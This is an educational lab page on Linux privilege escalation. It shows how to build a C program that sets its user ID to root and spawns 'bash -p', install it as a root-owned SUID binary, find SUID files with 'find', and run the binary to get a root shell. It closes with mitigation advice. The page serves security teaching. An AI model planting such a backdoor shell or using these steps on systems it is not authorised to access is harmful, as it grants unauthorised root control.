Logo Variant 0Logo Variant 1Logo Variant 2Logo Variant 3

Linux Privilege Escalation: SUID Binaries

Introduction

The SUID (Set User ID) bit is a special permission in Linux that allows a user to execute a program with the permissions of the file owner. This lab will guide you through identifying and exploiting a misconfigured SUID binary to escalate your privileges from a standard user to root.

For Educational Purposes Only

The techniques described in this lab should only be performed on systems you own or have explicit permission to test. Unauthorized access is illegal.

Lab Objectives

  • Understand how SUID permissions work.
  • Learn how to find all SUID-enabled files on a system.
  • Exploit a vulnerable SUID binary to gain a root shell.
  • Understand basic mitigation strategies.

Lab Setup

First, we need to create a vulnerable SUID binary. You can download the required source code file below or follow the steps to create it manually.

Download Lab Source Code

Contains the vulnerable.c file needed for this lab.

2 files524 Bytes
Download
  1. Create a new C file named vulnerable.c:
Terminal 
nano vulnerable.c
  1. Add the following code to the file. This program will grant root privileges and open a bash shell.
vulnerable.c 
#include <stdio.h>
#include <unistd.h>

int main() {
  setuid(0);
  setgid(0);
  execl("/bin/bash", "bash", "-p", NULL);
  return 0;
}

Bash '-p' Flag

The -p flag is crucial here. It prevents bash from dropping its effective root privileges when it starts, which is the default behavior for security reasons.

  1. Compile the program using gcc:
Terminal 
gcc vulnerable.c -o vulnerable_shell
  1. As a privileged user (sudo), change ownership to root and set the SUID bit:
Terminal 
sudo chown root:root vulnerable_shell
sudo chmod 4755 vulnerable_shell

Understanding chmod 4755

The 4 in 4755 sets the SUID bit. The 755 sets the standard read, write, and execute permissions for the owner, group, and others.

Step 1: Reconnaissance - Finding SUID Binaries

As a low-privilege user, your first step is to find all files on the system with the SUID bit set. The find command is perfect for this.

Terminal 
find / -perm -u=s -type f 2>/dev/null

This command will produce a list of all SUID binaries. You should see our vulnerable_shell in the output.

Step 2: Analysis - Identifying Vulnerable Binaries

After getting a list of SUID binaries, you need to identify which ones are abusable. In our case, vulnerable_shell is an obvious target. We can use the strings command to get a hint of what it does:

Terminal 
strings ./vulnerable_shell

You will likely see /bin/bash in the output, which is a strong indicator that it can spawn a shell.

Step 3: Exploitation

This is the simplest part of this lab. Since the binary is designed to open a shell, all we have to do is execute it.

Terminal 
./vulnerable_shell

Once you run it, check your user ID:

Terminal 
id

The output should be uid=0(root) gid=0(root) groups=0(root),.... Congratulations, you have successfully escalated your privileges to root!

Mitigation

Principle of Least Privilege

Never set the SUID bit on a file unless it is absolutely necessary. Regularly audit SUID binaries on your system and remove the permission from any that are not required.